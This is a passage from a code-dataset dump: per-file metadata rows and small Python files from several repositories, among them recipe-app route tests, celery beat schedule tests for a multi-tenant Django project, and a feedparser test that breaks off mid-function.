| 22.857143 | 33 | 0.7375 | 20 | 160 | 5.8 | 0.45 | 0.431034 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.1875 | 160 | 6 | 34 | 26.666667 | 0.892308 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
6de8c17b3fe1f71c0bd5e8eaa92e8a1f74efb39c | 43 | py | Python | sys-opration.py | xuzewei/jupyter | 85c3627f09a672a3c63db65efc945f76922c19ca | [
"Apache-2.0"
] | null | null | null | sys-opration.py | xuzewei/jupyter | 85c3627f09a672a3c63db65efc945f76922c19ca | [
"Apache-2.0"
] | null | null | null | sys-opration.py | xuzewei/jupyter | 85c3627f09a672a3c63db65efc945f76922c19ca | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
import sys
print(sys.path)
| 8.6 | 15 | 0.72093 | 8 | 43 | 3.875 | 0.875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.027027 | 0.139535 | 43 | 4 | 16 | 10.75 | 0.810811 | 0.27907 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0.5 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 6 |
6df9e5fea469d0a52ffa1b46e4ff453e161560b4 | 293 | py | Python | guestbook/views/parametrized_pagination_mixin.py | dagothar/django-guestbook | ed3e9608f3b973187bd7987557b3b04375cb1549 | [
"MIT"
] | null | null | null | guestbook/views/parametrized_pagination_mixin.py | dagothar/django-guestbook | ed3e9608f3b973187bd7987557b3b04375cb1549 | [
"MIT"
] | null | null | null | guestbook/views/parametrized_pagination_mixin.py | dagothar/django-guestbook | ed3e9608f3b973187bd7987557b3b04375cb1549 | [
"MIT"
] | null | null | null | class ParametrizedPaginationMixin():
"""Allows customizing paginate_by by checking for optional GET request
parameter: ?paginate_by
"""
def get_paginate_by(self, queryset):
paginate_by = self.request.GET.get('paginate_by', self.paginate_by)
return paginate_by
| 32.555556 | 75 | 0.723549 | 35 | 293 | 5.828571 | 0.457143 | 0.343137 | 0.205882 | 0.166667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.191126 | 293 | 8 | 76 | 36.625 | 0.860759 | 0.31058 | 0 | 0 | 0 | 0 | 0.058824 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0 | 0 | 0.75 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 6 |
09d98b5cbe037491a951ae3c144852da11fa0e11 | 126 | py | Python | matrix/exceptions.py | wwhtrbbtt/matrix.py | f299fce96182a72b30aaf3a8eddbdf4be1675161 | [
"MIT"
] | 4 | 2022-01-01T22:17:22.000Z | 2022-03-01T03:42:29.000Z | matrix/exceptions.py | wwhtrbbtt/matrix.py | f299fce96182a72b30aaf3a8eddbdf4be1675161 | [
"MIT"
] | null | null | null | matrix/exceptions.py | wwhtrbbtt/matrix.py | f299fce96182a72b30aaf3a8eddbdf4be1675161 | [
"MIT"
] | null | null | null | class MatrixError(Exception):
pass
class NotAuthenticated(Exception):
pass
class ParsingError(Exception):
pass
| 12.6 | 34 | 0.738095 | 12 | 126 | 7.75 | 0.5 | 0.419355 | 0.387097 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.190476 | 126 | 9 | 35 | 14 | 0.911765 | 0 | 0 | 0.5 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.5 | 0 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 6 |
09e8037a6eb7aaea5804831a8f8110ba69e29a4b | 57 | py | Python | aiorss/insertfeed.py | bradybellini/aiorss | f50f72e380f80506f835d7eac3410d2d18ab20a0 | [
"MIT"
] | null | null | null | aiorss/insertfeed.py | bradybellini/aiorss | f50f72e380f80506f835d7eac3410d2d18ab20a0 | [
"MIT"
] | null | null | null | aiorss/insertfeed.py | bradybellini/aiorss | f50f72e380f80506f835d7eac3410d2d18ab20a0 | [
"MIT"
] | null | null | null | import asyncio
import asyncpg
class InsertFeed:
pass | 11.4 | 17 | 0.789474 | 7 | 57 | 6.428571 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.192982 | 57 | 5 | 18 | 11.4 | 0.978261 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.25 | 0.5 | 0 | 0.75 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 6 |
61f1a0bc446d35752bf9571fabd1d671c5d8f313 | 149 | py | Python | dose_calculation.py | mdshane/semhelper | eeb177cb2fec22e53f46c24fbcfa1485cfa78005 | [
"MIT"
] | 1 | 2019-11-11T16:47:41.000Z | 2019-11-11T16:47:41.000Z | dose_calculation.py | mdshane/semhelper | eeb177cb2fec22e53f46c24fbcfa1485cfa78005 | [
"MIT"
] | null | null | null | dose_calculation.py | mdshane/semhelper | eeb177cb2fec22e53f46c24fbcfa1485cfa78005 | [
"MIT"
] | null | null | null | def dose(pitch_x, pitch_y, passes, current, dwell_time):
dose = (dwell_time * passes * current)/(pitch_x * pitch_y)
# nC/µm^2
return dose | 37.25 | 62 | 0.671141 | 24 | 149 | 3.916667 | 0.541667 | 0.12766 | 0.234043 | 0.255319 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008403 | 0.201342 | 149 | 4 | 63 | 37.25 | 0.781513 | 0.04698 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0.666667 | 0 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 6 |
112b02ee683d109945b45b2f7ffd93aba6da0005 | 34 | py | Python | double3/double3sdk/bluetooth/__init__.py | CLOMING/winter2021_double | 9b920baaeb3736a785a6505310b972c49b5b21e9 | [
"Apache-2.0"
] | null | null | null | double3/double3sdk/bluetooth/__init__.py | CLOMING/winter2021_double | 9b920baaeb3736a785a6505310b972c49b5b21e9 | [
"Apache-2.0"
] | null | null | null | double3/double3sdk/bluetooth/__init__.py | CLOMING/winter2021_double | 9b920baaeb3736a785a6505310b972c49b5b21e9 | [
"Apache-2.0"
] | null | null | null | from .bluetooth import _Bluetooth
| 17 | 33 | 0.852941 | 4 | 34 | 7 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.117647 | 34 | 1 | 34 | 34 | 0.933333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
113756c9eabaae19f5b7b79e5002835e318882b5 | 4,092 | py | Python | app/tests/test_recipe.py | Frozenaught/homechopped | 7c17abe98a1b4cb0ed6bced0d944d29a24dcbc27 | [
"BSD-Source-Code"
] | null | null | null | app/tests/test_recipe.py | Frozenaught/homechopped | 7c17abe98a1b4cb0ed6bced0d944d29a24dcbc27 | [
"BSD-Source-Code"
] | 2 | 2021-06-04T10:46:13.000Z | 2021-06-04T10:46:51.000Z | app/tests/test_recipe.py | NicBritz/homechopped | 7c17abe98a1b4cb0ed6bced0d944d29a24dcbc27 | [
"BSD-Source-Code"
] | 1 | 2020-06-20T13:14:56.000Z | 2020-06-20T13:14:56.000Z | from app import app
###############
# RECIPE VIEW #
###############
def test_recipe_main():
# test page link
response = app.test_client().get('/recipe/')
assert response.status_code == 404
# test pages,limits and page number
response = app.test_client().get('/recipe/5ee8f301c6eaae959bac7b00')
assert response.status_code == 200
# test error handling
response = app.test_client().get('/recipe/sgad1')
assert response.status_code == 404
###############
# TEMP RECIPE #
###############
def test_temp_recipe():
# test page link
response = app.test_client().get('/add_temp_recipe/')
assert response.status_code == 404
# test redirect
response = app.test_client().get('/add_temp_recipe/gfdsgd', follow_redirects=True)
assert response.status_code == 200
####################
# EDIT RECIPE VIEW #
####################
def test_edit_recipe():
# test page link
response = app.test_client().get('/edit_recipe/')
assert response.status_code == 404
# test error checking
response = app.test_client().get('/edit_recipe/gfdsgd/sfdds', follow_redirects=True)
assert response.status_code == 200
#################
# UPDATE RECIPE #
#################
def test_update_recipe():
# test page link
response = app.test_client().get('/update_recipe/')
assert response.status_code == 404
# test error checking
response = app.test_client().get('/update_recipe/gfdsgd/asfas', follow_redirects=True)
assert response.status_code == 404
#######################
# UPDATE RECIPE IMAGE #
#######################
def test_update_recipe_image():
# test page link
response = app.test_client().get('/update_recipe_image/')
assert response.status_code == 404
# test error checking
response = app.test_client().get('/update_recipe_image/gfdsgd/asfas', follow_redirects=True)
assert response.status_code == 404
#################
# DELETE RECIPE #
#################
def test_delete_recipe():
# test page link
response = app.test_client().get('/delete_recipe/')
assert response.status_code == 404
# test redirect
response = app.test_client().get('/delete_recipe/gfdsgd', follow_redirects=True)
assert response.status_code == 200
##################
# ADD INGREDIENT #
##################
def test_add_ingredient_item():
# test page link
response = app.test_client().get('/add_ingredient_item/')
assert response.status_code == 404
# test error
response = app.test_client().get('/add_ingredient_item/gfdsgd/sfsdf', follow_redirects=True)
assert response.status_code == 404
#####################
# DELETE INGREDIENT #
#####################
def test_delete_ingredient_item():
# test page link
response = app.test_client().get('/delete_ingredient_item/')
assert response.status_code == 404
# test error
    response = app.test_client().get('/delete_ingredient_item/gfdsgd/sfsdf', follow_redirects=True)
assert response.status_code == 404
###################
# ADD METHOD ITEM #
###################
def test_add_method_item():
# test page link
response = app.test_client().get('/add_method_item/')
assert response.status_code == 404
# test error
response = app.test_client().get('/add_method_item/gfdsgd/sfsdf', follow_redirects=True)
assert response.status_code == 404
######################
# DELETE METHOD ITEM #
######################
def test_delete_method_item():
# test page link
response = app.test_client().get('/delete_method_item/')
assert response.status_code == 404
# test error
response = app.test_client().get('/delete_method_item/gfdsgd/sfsdf', follow_redirects=True)
assert response.status_code == 404
###############
# RATE RECIPE #
###############
def test_rate_recipe():
# test page link
response = app.test_client().get('/rate_recipe/')
assert response.status_code == 404
# test post
response = app.test_client().post('/rate_recipe/ghfjgf', data={'rating': '1'}, follow_redirects=True)
assert response.status_code == 404
| 28.816901 | 105 | 0.633431 | 481 | 4,092 | 5.149688 | 0.106029 | 0.10214 | 0.139281 | 0.194994 | 0.824384 | 0.802584 | 0.778361 | 0.740412 | 0.677836 | 0.601534 | 0 | 0.024177 | 0.161046 | 4,092 | 141 | 106 | 29.021277 | 0.697349 | 0.131965 | 0 | 0.396552 | 0 | 0 | 0.166022 | 0.115409 | 0 | 0 | 0 | 0 | 0.396552 | 1 | 0.189655 | false | 0 | 0.017241 | 0 | 0.206897 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
1167347bea395f4eedbbde7de5179e9fd7093929 | 116 | py | Python | test_mayavi.py | roughhawkbit/robs-python-scripts | 7d9a28cff106887553970b5c4c37cd53a836c2ff | [
"MIT"
] | null | null | null | test_mayavi.py | roughhawkbit/robs-python-scripts | 7d9a28cff106887553970b5c4c37cd53a836c2ff | [
"MIT"
] | 1 | 2015-02-23T16:31:21.000Z | 2015-02-25T16:34:14.000Z | test_mayavi.py | roughhawkbit/robs-python-scripts | 7d9a28cff106887553970b5c4c37cd53a836c2ff | [
"MIT"
] | null | null | null | #!/usr/bin/python
from __future__ import division
from __future__ import with_statement
import mayavi
import numpy
| 16.571429 | 37 | 0.836207 | 16 | 116 | 5.5 | 0.6875 | 0.227273 | 0.363636 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.12069 | 116 | 6 | 38 | 19.333333 | 0.862745 | 0.137931 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
fedaeaab8052b4c954c46825fa0ee67ba4dbc1a6 | 18 | py | Python | nginpro/__main__.py | thesabbir/nginpro | b3ca2fbadc19fa28798434bb640f4d0a1bf742b9 | [
"MIT"
] | 1 | 2020-12-28T16:33:54.000Z | 2020-12-28T16:33:54.000Z | nginpro/__main__.py | thesabbir/nginpro | b3ca2fbadc19fa28798434bb640f4d0a1bf742b9 | [
"MIT"
] | null | null | null | nginpro/__main__.py | thesabbir/nginpro | b3ca2fbadc19fa28798434bb640f4d0a1bf742b9 | [
"MIT"
] | null | null | null | from ngin import * | 18 | 18 | 0.777778 | 3 | 18 | 4.666667 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.166667 | 18 | 1 | 18 | 18 | 0.933333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
feedc77aca85c9824ed89c56afa1ea14b5ca3270 | 95 | py | Python | tests/test_basic.py | RonnyPfannschmidt/dynaconf | 3223f6586aa6ae3ef7b5cd7d198fb950f5038526 | [
"MIT"
] | 2,293 | 2015-08-14T22:39:31.000Z | 2022-03-31T12:44:49.000Z | tests/test_basic.py | RonnyPfannschmidt/dynaconf | 3223f6586aa6ae3ef7b5cd7d198fb950f5038526 | [
"MIT"
] | 676 | 2015-08-20T19:29:56.000Z | 2022-03-31T13:45:51.000Z | tests/test_basic.py | RonnyPfannschmidt/dynaconf | 3223f6586aa6ae3ef7b5cd7d198fb950f5038526 | [
"MIT"
] | 255 | 2015-12-02T21:16:33.000Z | 2022-03-20T22:03:46.000Z | from dynaconf import settings
def test_has_wrapped():
assert settings.configured is True
| 15.833333 | 38 | 0.789474 | 13 | 95 | 5.615385 | 0.923077 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.168421 | 95 | 5 | 39 | 19 | 0.924051 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.333333 | 1 | 0.333333 | true | 0 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
3a1bf5b7a2d77585574b3425f6b4f4df5f2f5ba6 | 26 | py | Python | section1/lesson2_step2_hello_selenium.py | andreymelostnoy/stepik_selenium_python | fa5912c2f7360616ccb914d821853af6a51fd324 | [
"Apache-2.0"
] | null | null | null | section1/lesson2_step2_hello_selenium.py | andreymelostnoy/stepik_selenium_python | fa5912c2f7360616ccb914d821853af6a51fd324 | [
"Apache-2.0"
] | 1 | 2021-06-02T00:25:52.000Z | 2021-06-02T00:25:52.000Z | section1/lesson2_step2_hello_selenium.py | andreymelostnoy/stepik_selenium_python | fa5912c2f7360616ccb914d821853af6a51fd324 | [
"Apache-2.0"
] | null | null | null | print("Hello, Selenium!")
| 13 | 25 | 0.692308 | 3 | 26 | 6 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.076923 | 26 | 1 | 26 | 26 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0.615385 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
3a2a8614105e4d0fa7c3ae3d8b36571b11507913 | 180 | py | Python | det3d/models/necks/__init__.py | stooloveu/Det3D | ac20e98e88c2b0c99ccbe9e7307608d18e87e885 | [
"Apache-2.0"
] | 5 | 2021-01-10T08:14:11.000Z | 2021-06-19T15:01:15.000Z | det3d/models/necks/__init__.py | stooloveu/Det3D | ac20e98e88c2b0c99ccbe9e7307608d18e87e885 | [
"Apache-2.0"
] | null | null | null | det3d/models/necks/__init__.py | stooloveu/Det3D | ac20e98e88c2b0c99ccbe9e7307608d18e87e885 | [
"Apache-2.0"
] | 4 | 2020-11-24T06:31:14.000Z | 2021-06-19T15:01:26.000Z | from .fpn import FPN, ResNet_FPN, ResNet_Panoptic_FPN
from .rpn import RPN, PointModule
__all__ = ["RPN", "PointModule", "FPN", "ResNet_FPN", "ResNet_FPN", "ResNet_Panoptic_FPN"]
| 36 | 90 | 0.75 | 25 | 180 | 4.96 | 0.32 | 0.362903 | 0.290323 | 0.435484 | 0.467742 | 0.467742 | 0 | 0 | 0 | 0 | 0 | 0 | 0.111111 | 180 | 4 | 91 | 45 | 0.775 | 0 | 0 | 0 | 0 | 0 | 0.311111 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.666667 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
3a7b04626a9e049d7b7477d76dfde7bac642e058 | 5,155 | py | Python | example/tests/test_utils.py | ZipDeal-LLC/django-tenants-celery-beat | 7eea658502289385b64b9dbd25e73d85db563516 | [
"MIT"
] | 4 | 2021-02-26T22:50:47.000Z | 2021-06-05T07:59:43.000Z | example/tests/test_utils.py | ZipDeal-LLC/django-tenants-celery-beat | 7eea658502289385b64b9dbd25e73d85db563516 | [
"MIT"
] | 15 | 2021-02-26T22:54:56.000Z | 2022-02-22T18:52:11.000Z | example/tests/test_utils.py | ZipDeal-LLC/django-tenants-celery-beat | 7eea658502289385b64b9dbd25e73d85db563516 | [
"MIT"
] | 2 | 2021-12-07T03:57:32.000Z | 2022-02-25T17:37:06.000Z | from celery.schedules import crontab
from django.test import TestCase
from django_tenants_celery_beat.utils import generate_beat_schedule
from tenancy.models import Tenant
class GenerateBeatScheduleTestCase(TestCase):
@classmethod
def setUpTestData(cls):
Tenant.objects.bulk_create(
[
Tenant(name="Tenant 1", schema_name="tenant1", timezone="Europe/London"),
Tenant(name="Tenant 2", schema_name="tenant2", timezone="US/Eastern"),
]
)
def test_public(self):
expected = {
"task_name": {
"task": "core.tasks.test_task",
"schedule": crontab(),
"options": {
"headers": {"_schema_name": "public", "_use_tenant_timezone": False}
}
}
}
beat_schedule = generate_beat_schedule(
{
"task_name": {
"task": "core.tasks.test_task",
"schedule": crontab(),
"tenancy_options": {
"public": True,
"all_tenants": False,
"use_tenant_timezone": False,
}
},
}
)
self.assertEqual(beat_schedule, expected)
def test_all_tenants(self):
expected = {
"tenant1: task_name": {
"task": "core.tasks.test_task",
"schedule": crontab(day_of_month=1),
"options": {"headers": {"_schema_name": "tenant1", "_use_tenant_timezone": False}}
},
"tenant2: task_name": {
"task": "core.tasks.test_task",
"schedule": crontab(day_of_month=1),
"options": {"headers": {"_schema_name": "tenant2", "_use_tenant_timezone": False}}
}
}
beat_schedule = generate_beat_schedule(
{
"task_name": {
"task": "core.tasks.test_task",
"schedule": crontab(day_of_month=1),
"tenancy_options": {
"public": False,
"all_tenants": True,
"use_tenant_timezone": False,
}
},
}
)
self.assertEqual(beat_schedule, expected)
def test_public_all_tenants(self):
expected = {
"task_name": {
"task": "core.tasks.test_task",
"schedule": crontab(day_of_month=1),
"options": {
"headers": {
"_schema_name": "public", "_use_tenant_timezone": False
}
}
},
"tenant1: task_name": {
"task": "core.tasks.test_task",
"schedule": crontab(day_of_month=1),
"options": {
"headers": {
"_schema_name": "tenant1", "_use_tenant_timezone": False
}
}
},
"tenant2: task_name": {
"task": "core.tasks.test_task",
"schedule": crontab(day_of_month=1),
"options": {
"headers": {
"_schema_name": "tenant2", "_use_tenant_timezone": False
}
}
}
}
beat_schedule = generate_beat_schedule(
{
"task_name": {
"task": "core.tasks.test_task",
"schedule": crontab(day_of_month=1),
"tenancy_options": {
"public": True,
"all_tenants": True,
"use_tenant_timezone": False,
}
},
}
)
self.assertEqual(beat_schedule, expected)
def test_use_tenant_timezone(self):
expected = {
"tenant1: task_name": {
"task": "core.tasks.test_task",
"schedule": crontab(0, 1),
"options": {
"headers": {
"_schema_name": "tenant1", "_use_tenant_timezone": True
}
}
},
"tenant2: task_name": {
"task": "core.tasks.test_task",
"schedule": crontab(0, 1),
"options": {
"headers": {
"_schema_name": "tenant2", "_use_tenant_timezone": True
}
}
}
}
beat_schedule = generate_beat_schedule(
{
"task_name": {
"task": "core.tasks.test_task",
"schedule": crontab(0, 1),
"tenancy_options": {
"public": False,
"all_tenants": True,
"use_tenant_timezone": True,
}
},
}
)
self.assertEqual(beat_schedule, expected)
| 34.139073 | 98 | 0.423084 | 385 | 5,155 | 5.335065 | 0.137662 | 0.075949 | 0.107595 | 0.093476 | 0.796008 | 0.778968 | 0.760467 | 0.760467 | 0.760467 | 0.708861 | 0 | 0.010507 | 0.464597 | 5,155 | 150 | 99 | 34.366667 | 0.733696 | 0 | 0 | 0.51049 | 1 | 0 | 0.237633 | 0 | 0 | 0 | 0 | 0 | 0.027972 | 1 | 0.034965 | false | 0 | 0.027972 | 0 | 0.06993 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
c9222213d3f12bd43d453c55ba0af4e5b3eb3247 | 81 | py | Python | src/daos/exceptions/__init__.py | taonguyen740/flask_based_3tier_framework | f02e492eff0206e661925dddcf0ba978ead38b5e | [
"MIT"
] | null | null | null | src/daos/exceptions/__init__.py | taonguyen740/flask_based_3tier_framework | f02e492eff0206e661925dddcf0ba978ead38b5e | [
"MIT"
] | null | null | null | src/daos/exceptions/__init__.py | taonguyen740/flask_based_3tier_framework | f02e492eff0206e661925dddcf0ba978ead38b5e | [
"MIT"
] | null | null | null | from .dao_exception import DaoException
from .dao_error_code import DaoErrorCode
| 27 | 40 | 0.876543 | 11 | 81 | 6.181818 | 0.727273 | 0.205882 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.098765 | 81 | 2 | 41 | 40.5 | 0.931507 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
c92f83b5adbd17272b3872b2b2e3717a8d19c7ea | 41 | py | Python | .history/app/__init___20210927034955.py | GraceOswal/pitch-perfect | d781c6e0f55c11f2a5e5dceb952f6b2de3c47c3b | [
"MIT"
] | null | null | null | .history/app/__init___20210927034955.py | GraceOswal/pitch-perfect | d781c6e0f55c11f2a5e5dceb952f6b2de3c47c3b | [
"MIT"
] | null | null | null | .history/app/__init___20210927034955.py | GraceOswal/pitch-perfect | d781c6e0f55c11f2a5e5dceb952f6b2de3c47c3b | [
"MIT"
] | null | null | null | from flask_sqlalchemy import SQLAlchemy
| 13.666667 | 39 | 0.878049 | 5 | 41 | 7 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.121951 | 41 | 2 | 40 | 20.5 | 0.972222 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
c94fbeafbaf48387b4f175f545254fecf6b65086 | 41 | py | Python | donkey_gym/envs/__init__.py | araffin/donkey_gym | f49b1d578f9189d97eba221d7c9a2128b97d31a0 | [
"MIT"
] | null | null | null | donkey_gym/envs/__init__.py | araffin/donkey_gym | f49b1d578f9189d97eba221d7c9a2128b97d31a0 | [
"MIT"
] | null | null | null | donkey_gym/envs/__init__.py | araffin/donkey_gym | f49b1d578f9189d97eba221d7c9a2128b97d31a0 | [
"MIT"
] | null | null | null | from donkey_gym.envs.donkey_env import *
| 20.5 | 40 | 0.829268 | 7 | 41 | 4.571429 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.097561 | 41 | 1 | 41 | 41 | 0.864865 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
c958e528a13ded6c42166661735235007e9d85d5 | 1,929 | py | Python | tests/test_create_feed_from_url.py | adrian/feed2me | 446d1a3c320a64fb74adfee0736c4fa4a7eb7e0b | [
"MIT"
] | 4 | 2015-12-18T07:27:14.000Z | 2017-09-15T02:18:08.000Z | tests/test_create_feed_from_url.py | adrian/feed2me | 446d1a3c320a64fb74adfee0736c4fa4a7eb7e0b | [
"MIT"
] | null | null | null | tests/test_create_feed_from_url.py | adrian/feed2me | 446d1a3c320a64fb74adfee0736c4fa4a7eb7e0b | [
"MIT"
] | null | null | null | import unittest
import views
import feedparser
class TestCreateFeedFromURL(unittest.TestCase):
def setUp(self):
self.orig_parse_func = feedparser.parse
def test_with_character_encoding_exception(self):
test_feed = feedparser.FeedParserDict()
test_feed['bozo'] = True
test_feed['bozo_exception'] = feedparser.ThingsNobodyCaresAboutButMe()
test_feed['status'] = 200
test_feed['channel'] = feedparser.FeedParserDict()
test_feed['channel']['title'] = "A Test Feed"
test_feed['entries'] = []
feedparser.parse = lambda url: test_feed
